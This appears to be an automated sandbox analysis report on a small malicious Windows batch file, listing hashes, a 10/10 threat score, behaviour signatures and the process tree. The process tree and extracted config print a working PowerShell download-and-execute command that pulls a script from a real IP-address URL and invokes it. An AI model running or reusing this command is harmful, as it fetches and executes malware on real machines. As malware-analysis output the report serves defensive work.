Analysis
-
max time kernel
130s -
max time network
78s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
7dd11380f39c84448a7000c280f12a78.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
7dd11380f39c84448a7000c280f12a78.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
7dd11380f39c84448a7000c280f12a78.bat
-
Size
219B
-
MD5
694736c7cc588c0f7d4fea15b4f4e074
-
SHA1
322715308f98b4e097a6e8eb88c84cd75e6dffa3
-
SHA256
45b6d83a99693328a71a689d57f8b722e4e74c34b984569bec15e1108852bebc
-
SHA512
c93891f9542c5b111d290df367ff1019cc46f5b23f32df4b83989ba23a79215906029cbe2568c45f4226e650d3c55e50dcf6a5dd6fb382721e99f6da47bdd3d8
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/7dd11380f39c84448a7000c280f12a78
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2204 2908 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2204 WerFault.exe Token: SeBackupPrivilege 2204 WerFault.exe Token: SeDebugPrivilege 2204 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7dd11380f39c84448a7000c280f12a78.bat"1⤵PID:1916
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/7dd11380f39c84448a7000c280f12a78');Invoke-GLRLIILZKEHV;Start-Sleep -s 10000"2⤵PID:2908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2204